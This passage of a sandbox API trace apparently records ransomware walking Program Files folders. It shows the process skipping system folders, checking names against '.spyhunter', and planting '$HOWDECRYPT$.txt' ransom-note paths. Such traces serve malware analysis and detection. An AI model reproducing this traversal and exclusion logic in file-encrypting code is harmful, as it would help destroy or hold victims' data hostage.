pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned 53 [0091.257] lstrcmpW (lpString1="VC", lpString2=".") returned 1 [0091.257] lstrcmpW (lpString1="VC", lpString2="..") returned 1 [0091.258] GetProcessHeap () returned 0x2c0000 [0091.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.258] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*") returned 55 [0091.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.293] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.293] lstrlenW (lpString="Windows") returned 7 [0091.293] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.293] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.293] lstrlenW (lpString="System Volume Information") returned 25 [0091.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\.") returned 55 [0091.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.293] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.293] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.293] lstrlenW (lpString="Windows") returned 7 [0091.293] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.293] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.293] lstrlenW (lpString="System Volume Information") returned 25 [0091.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\..") returned 56 [0091.293] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.293] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.293] lstrcmpiW (lpString1="msdia100.dll", lpString2="Windows") returned -1 [0091.293] lstrlenW (lpString="Windows") returned 7 [0091.294] lstrcmpiW (lpString1="msdia100.dll", lpString2="$Recycle.bin") returned 1 [0091.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.294] lstrcmpiW (lpString1="msdia100.dll", lpString2="System Volume Information") returned -1 [0091.294] lstrlenW (lpString="System Volume Information") returned 25 [0091.294] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0091.294] StrStrIW (lpFirst="msdia100.dll", lpSrch=".spyhunter") returned 0x0 [0091.294] lstrcmpW (lpString1="msdia100.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.294] lstrcmpW (lpString1="msdia100.dll", lpString2="_uninstalling_.png") returned 1 [0091.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0091.294] GetProcessHeap () returned 0x2c0000 [0091.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358060 [0091.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14e8) returned 0x3824f8 [0091.294] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.294] lstrcmpiW (lpString1="msdia90.dll", lpString2="Windows") returned -1 [0091.294] lstrlenW (lpString="Windows") returned 7 [0091.294] lstrcmpiW (lpString1="msdia90.dll", lpString2="$Recycle.bin") returned 1 [0091.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.294] lstrcmpiW (lpString1="msdia90.dll", lpString2="System Volume Information") returned -1 [0091.294] lstrlenW (lpString="System Volume Information") returned 25 [0091.294] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0091.294] StrStrIW (lpFirst="msdia90.dll", lpSrch=".spyhunter") returned 0x0 [0091.294] lstrcmpW (lpString1="msdia90.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.294] lstrcmpW (lpString1="msdia90.dll", lpString2="_uninstalling_.png") returned 1 [0091.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0091.295] GetProcessHeap () returned 0x2c0000 [0091.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358130 [0091.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f0) returned 0x3824f8 [0091.295] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.295] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.295] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\$HOWDECRYPT$.txt") returned 70 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\$HOWDECRYPT$.txt") returned 70 [0091.295] GetProcessHeap () returned 0x2c0000 [0091.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e200 [0091.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f8) returned 0x3824f8 [0091.297] FindNextFileW (hFindFile=0x335f20, lpFindFileData=0x298f348) [0091.298] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.298] lstrcmpiW (lpString1="VGX", lpString2="Windows") returned -1 [0091.298] lstrlenW (lpString="Windows") returned 7 [0091.299] lstrcmpiW (lpString1="VGX", lpString2="$Recycle.bin") returned 1 [0091.299] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.299] lstrcmpiW (lpString1="VGX", lpString2="System Volume Information") returned 1 [0091.299] lstrlenW (lpString="System Volume Information") returned 25 [0091.299] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned 54 [0091.299] lstrcmpW (lpString1="VGX", lpString2=".") returned 1 [0091.299] lstrcmpW (lpString1="VGX", lpString2="..") returned 1 [0091.299] GetProcessHeap () returned 0x2c0000 [0091.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.300] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*") returned 56 [0091.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.300] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.300] lstrlenW (lpString="Windows") returned 7 [0091.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.301] lstrlenW (lpString="System Volume Information") returned 25 [0091.301] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\.") returned 56 [0091.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.301] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.301] lstrlenW (lpString="Windows") returned 7 [0091.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.301] lstrlenW (lpString="System Volume Information") returned 25 [0091.301] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\..") returned 57 [0091.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.301] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.301] lstrcmpiW (lpString1="VGX.dll", lpString2="Windows") returned -1 [0091.301] lstrlenW (lpString="Windows") returned 7 [0091.301] lstrcmpiW (lpString1="VGX.dll", lpString2="$Recycle.bin") returned 1 [0091.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.301] lstrcmpiW (lpString1="VGX.dll", lpString2="System Volume Information") returned 1 [0091.301] lstrlenW (lpString="System Volume Information") returned 25 [0091.301] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned 62 [0091.301] StrStrIW (lpFirst="VGX.dll", lpSrch=".spyhunter") returned 0x0 [0091.301] lstrcmpW (lpString1="VGX.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.302] lstrcmpW (lpString1="VGX.dll", lpString2="_uninstalling_.png") returned 1 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned 62 [0091.302] GetProcessHeap () returned 0x2c0000 [0091.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d4f0 [0091.302] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1500) returned 0x3824f8 [0091.302] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.302] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.302] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\$HOWDECRYPT$.txt") returned 71 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\$HOWDECRYPT$.txt") returned 71 [0091.302] GetProcessHeap () returned 0x2c0000 [0091.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e2d8 [0091.302] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1508) returned 0x3824f8 [0091.302] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.302] lstrcmpiW (lpString1="Visio Shared", lpString2="Windows") returned -1 [0091.302] lstrlenW (lpString="Windows") returned 7 [0091.302] lstrcmpiW (lpString1="Visio Shared", lpString2="$Recycle.bin") returned 1 [0091.302] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.302] lstrcmpiW (lpString1="Visio Shared", lpString2="System Volume Information") returned 1 [0091.302] lstrlenW (lpString="System Volume Information") returned 25 [0091.302] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned 63 [0091.303] lstrcmpW (lpString1="Visio Shared", lpString2=".") returned 1 [0091.303] lstrcmpW (lpString1="Visio Shared", lpString2="..") returned 1 [0091.303] GetProcessHeap () returned 0x2c0000 [0091.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.303] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*") returned 65 [0091.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.309] lstrlenW (lpString="Windows") returned 7 [0091.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.309] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.309] lstrlenW (lpString="System Volume Information") returned 25 [0091.309] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\.") returned 65 [0091.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.309] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.310] lstrlenW (lpString="Windows") returned 7 [0091.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.310] lstrlenW (lpString="System Volume Information") returned 25 [0091.310] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\..") returned 66 [0091.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.310] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.310] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0091.310] lstrlenW (lpString="Windows") returned 7 [0091.310] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0091.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.310] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0091.311] lstrlenW (lpString="System Volume Information") returned 25 [0091.311] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned 69 [0091.311] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0091.311] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0091.311] GetProcessHeap () returned 0x2c0000 [0091.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.312] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*") returned 71 [0091.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.465] lstrlenW (lpString="Windows") returned 7 [0091.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.465] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.471] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.471] lstrlenW (lpString="System Volume Information") returned 25 [0091.471] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\.") returned 71 [0091.471] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.471] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.471] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.471] lstrlenW (lpString="Windows") returned 7 [0091.471] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.471] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.471] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.471] lstrlenW (lpString="System Volume Information") returned 25 [0091.471] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\..") returned 72 [0091.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.472] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.472] lstrcmpiW (lpString1="BIGFONT.SHX", lpString2="Windows") returned -1 [0091.472] lstrlenW (lpString="Windows") returned 7 [0091.472] lstrcmpiW (lpString1="BIGFONT.SHX", lpString2="$Recycle.bin") returned 1 [0091.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.472] lstrcmpiW (lpString1="BIGFONT.SHX", lpString2="System Volume Information") returned -1 [0091.472] lstrlenW (lpString="System Volume Information") returned 25 [0091.472] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0091.472] StrStrIW (lpFirst="BIGFONT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.472] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.472] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0091.472] GetProcessHeap () returned 0x2c0000 [0091.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e8d8 [0091.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d8) returned 0x3824f8 [0091.472] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.472] lstrcmpiW (lpString1="CHINESET.SHX", lpString2="Windows") returned -1 [0091.472] lstrlenW (lpString="Windows") returned 7 [0091.472] lstrcmpiW (lpString1="CHINESET.SHX", lpString2="$Recycle.bin") returned 1 [0091.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.472] lstrcmpiW (lpString1="CHINESET.SHX", lpString2="System Volume Information") returned -1 [0091.472] lstrlenW (lpString="System Volume Information") returned 25 [0091.472] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0091.473] StrStrIW (lpFirst="CHINESET.SHX", lpSrch=".spyhunter") returned 0x0 [0091.473] lstrcmpW (lpString1="CHINESET.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.473] lstrcmpW (lpString1="CHINESET.SHX", lpString2="_uninstalling_.png") returned 1 [0091.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0091.473] GetProcessHeap () returned 0x2c0000 [0091.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34eba8 [0091.473] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14e0) returned 0x3824f8 [0091.473] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.473] lstrcmpiW (lpString1="EXTFONT.SHX", lpString2="Windows") returned -1 [0091.473] lstrlenW (lpString="Windows") returned 7 [0091.473] lstrcmpiW (lpString1="EXTFONT.SHX", lpString2="$Recycle.bin") returned 1 [0091.473] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.473] lstrcmpiW (lpString1="EXTFONT.SHX", lpString2="System Volume Information") returned -1 [0091.473] lstrlenW (lpString="System Volume Information") returned 25 [0091.473] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0091.473] StrStrIW (lpFirst="EXTFONT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.473] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.473] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0091.473] GetProcessHeap () returned 0x2c0000 [0091.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ec98 [0091.473] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14e8) returned 0x3824f8 [0091.473] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.474] lstrcmpiW (lpString1="GBCBIG.SHX", lpString2="Windows") returned -1 [0091.474] lstrlenW (lpString="Windows") returned 7 [0091.474] lstrcmpiW (lpString1="GBCBIG.SHX", lpString2="$Recycle.bin") returned 1 [0091.474] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.474] lstrcmpiW (lpString1="GBCBIG.SHX", lpString2="System Volume Information") returned -1 [0091.474] lstrlenW (lpString="System Volume Information") returned 25 [0091.474] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0091.474] StrStrIW (lpFirst="GBCBIG.SHX", lpSrch=".spyhunter") returned 0x0 [0091.474] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.474] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="_uninstalling_.png") returned 1 [0091.474] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0091.474] GetProcessHeap () returned 0x2c0000 [0091.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34ed88 [0091.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f0) returned 0x3824f8 [0091.474] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.474] lstrcmpiW (lpString1="IC-TXT.SHX", lpString2="Windows") returned -1 [0091.474] lstrlenW (lpString="Windows") returned 7 [0091.474] lstrcmpiW (lpString1="IC-TXT.SHX", lpString2="$Recycle.bin") returned 1 [0091.474] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.474] lstrcmpiW (lpString1="IC-TXT.SHX", lpString2="System Volume Information") returned -1 [0091.474] lstrlenW (lpString="System Volume Information") returned 25 [0091.474] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0091.474] StrStrIW (lpFirst="IC-TXT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.474] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.474] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.475] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0091.475] GetProcessHeap () returned 0x2c0000 [0091.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34ee78 [0091.475] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f8) returned 0x3824f8 [0091.475] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.475] lstrcmpiW (lpString1="ICAD.FMP", lpString2="Windows") returned -1 [0091.475] lstrlenW (lpString="Windows") returned 7 [0091.475] lstrcmpiW (lpString1="ICAD.FMP", lpString2="$Recycle.bin") returned 1 [0091.475] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.475] lstrcmpiW (lpString1="ICAD.FMP", lpString2="System Volume Information") returned -1 [0091.475] lstrlenW (lpString="System Volume Information") returned 25 [0091.475] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0091.475] StrStrIW (lpFirst="ICAD.FMP", lpSrch=".spyhunter") returned 0x0 [0091.475] lstrcmpW (lpString1="ICAD.FMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.475] lstrcmpW (lpString1="ICAD.FMP", lpString2="_uninstalling_.png") returned 1 [0091.475] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0091.475] GetProcessHeap () returned 0x2c0000 [0091.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377e20 [0091.475] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1500) returned 0x3824f8 [0091.475] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.475] lstrcmpiW (lpString1="WHGDTXT.SHX", lpString2="Windows") returned -1 [0091.475] lstrlenW (lpString="Windows") returned 7 [0091.475] lstrcmpiW (lpString1="WHGDTXT.SHX", lpString2="$Recycle.bin") returned 1 [0091.476] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.476] lstrcmpiW (lpString1="WHGDTXT.SHX", lpString2="System Volume Information") returned 1 [0091.476] lstrlenW (lpString="System Volume Information") returned 25 [0091.476] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0091.476] StrStrIW (lpFirst="WHGDTXT.SHX", lpSrch=".spyhunter") returned 0x0 [0091.476] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.476] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0091.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0091.476] GetProcessHeap () returned 0x2c0000 [0091.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ef68 [0091.476] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1508) returned 0x3824f8 [0091.476] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.476] lstrcmpiW (lpString1="WHGTXT.SHX", lpString2="Windows") returned -1 [0091.476] lstrlenW (lpString="Windows") returned 7 [0091.476] lstrcmpiW (lpString1="WHGTXT.SHX", lpString2="$Recycle.bin") returned 1 [0091.476] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.476] lstrcmpiW (lpString1="WHGTXT.SHX", lpString2="System Volume Information") returned 1 [0091.476] lstrlenW (lpString="System Volume Information") returned 25 [0091.476] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0091.476] StrStrIW (lpFirst="WHGTXT.SHX", 